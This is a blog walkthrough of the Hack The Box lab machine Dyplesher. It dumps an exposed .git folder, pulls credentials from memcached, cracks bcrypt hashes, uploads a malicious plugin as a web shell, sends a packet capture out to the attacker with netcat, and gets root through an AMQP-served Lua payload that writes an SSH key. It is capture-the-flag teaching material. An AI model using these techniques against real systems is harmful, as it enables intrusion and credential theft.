SecWalk.com

HTB Walkthrough Dyplesher 10.10.10.190

Summary

Dyplesher is released on 23 th of may in 2020

Foothold

This machine was insane rated. in order to gain a foothold we had to dump .git folder.

User

After a lot of enumeration and a few logins we finally arrived to the login page where we can upload a malicious plugin so we can get a web shell with code execution, this way I could write my ssh key to this user and were able to login on the box, after looking around we see that we have a group called wireshark, this means we can intercept packets and read the output from it, After studying those files we got some new credentials and were able to get the user.txt

Root

Felamos his home folder contains a hint that there is a tool wich reviews the code automatically, after some research I found out this could be done with AMPQ. To get root we took advantage of the program AMPQ

Enumeration

Nmap

nmap -p- -A 10.10.10.190


Web

Going to http://10.10.10.190 shows:

http://10.10.10.190/login shows:

Nothing interesting to find on here

page showed ealier a host name test.dyplesher.htb adding test.dyplesher.htb to /etc/hosts

http://test.dyplesher.htb shows:

Couldn’t find anything on this page so i moved on.

http://10.10.10.190:3000 shows:

Also nothing to find right now

nmap result showed there should be a .git directory on port 80:

http://10.10.10.190/.git shows:

But since there is a vhost we should check this one as well:

Looks like something is there but no access time to poke around a bit.

Found something about git that there should be a way to dump git files, found the folowing tool:

https://github.com/internetwache/GitTools

mkdir gitdump

bash dumper.sh http://test.dyplesher.htb/.git/ /root/s3cwalk/dyplesher/gitdump/

We could extract some files

When we look into the index file we see the following:


Looks like this file has been removed, after some research there is a change we could restore thise files with git restore:

git restore index.php

We found some credentials for Memcached, this port was also open on the nmap so time to go poke around there.

Memcached

Getting vallues out of memcached:

memccat email –servers=10.10.10.190 –username=felamos –password=zxcvbnm


MinatoTW@dyplesher.htb
felamos@dyplesher.htb
yuntao@dyplesher.htb

memccat username –servers=10.10.10.190 –username=felamos –password=zxcvbnm

MinatoTW
felamos
yuntao

memccat password –servers=10.10.10.190 –username=felamos –password=zxcvbnm

$2a$10$5SAkMNF9fPNamlpWr.ikte0rHInGcU54tvazErpuwGPFePuI1DCJa
$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK
$2a$10$zXNCus.UXtiuJE5e6lsQGefnAH3zipl.FRNySz5C4RjitiwUoalS

We found some value information, lets try now to decrypt these bcrypt hashes

hashcat64.exe -m 3200 hashes.txt rockyou.txt

$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK:mommy1

We can now login to http://10.10.10.190:3000


When logged in there seems not much there but under releases there is a file called repo.zip

This file contains a folder repositories with bundle files types since this is a Repo let’s try to git clone them:

git clone 4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle

git clone 4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle

git clone 4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle

Git clone 6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle

git clone d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle

in this folder is a DB file which contains a hash:

s3cwalk/dyplesher/repositories/@hashed/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins/LoginSecurity/user.db


$2a$10$IRgHi7pBhb9K0QBQBOzOju0PyOZhBnK4yaWjeZYdeP6oyDvCo9vc6

Also bcrypt when we decrypt this one the password is alexis1

Next step is to find out where to login with it and with what username, from the web enumeration earlier there is still a page we weren’t able to login to so let’s try that one:

http://10.10.10.190/login

and we are logged in:


Time to develop our own malicious plugin

adding new java package:

adding new class:

adding plugin.yml:

also create pom.xml

plugin.yml contains:


main contains:

pom files contains:

Time to build jar file:

upload plugin

load plugin

check if plugin is loaded

visit: http://test.dyplesher.htb/secwalk.php?cmd=id

upload our ssh rsa key to MinatoTW:

login with ssh:

id shows that we can run wireshark, with wireshark we can intercept the network traffic

tshark -i any -w secwalk.pcap

sending file with netcat to my machine so i have a visual look with wireshark:

send: nc -w 3 10.10.14.12 11211 < secwalk.pcap

recieve: nc -l -p 11211 > secwalk.pcap

found credentials in AMQP packet:


and we got our first flag:

Felamos his home folder contains a hint for root privesc:

Ealier in the wireshark capture there were also creds availble for AMPQ service, this service does exactly what they mention here so lets try to exploit that.

Firs we need to create/edit an python script so we can connect with the service:

after this is done we create a lua file wich write our RSA ssh key to the root folder:

our lua payload file looks like:

python -m SimpleHTTPServer 5672

python3 shell.py http://10.10.14.12:5672/payload.lua

we can see the command was successful:

and we got root on the Box:

Job done

Made by: S3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.

Leave a Reply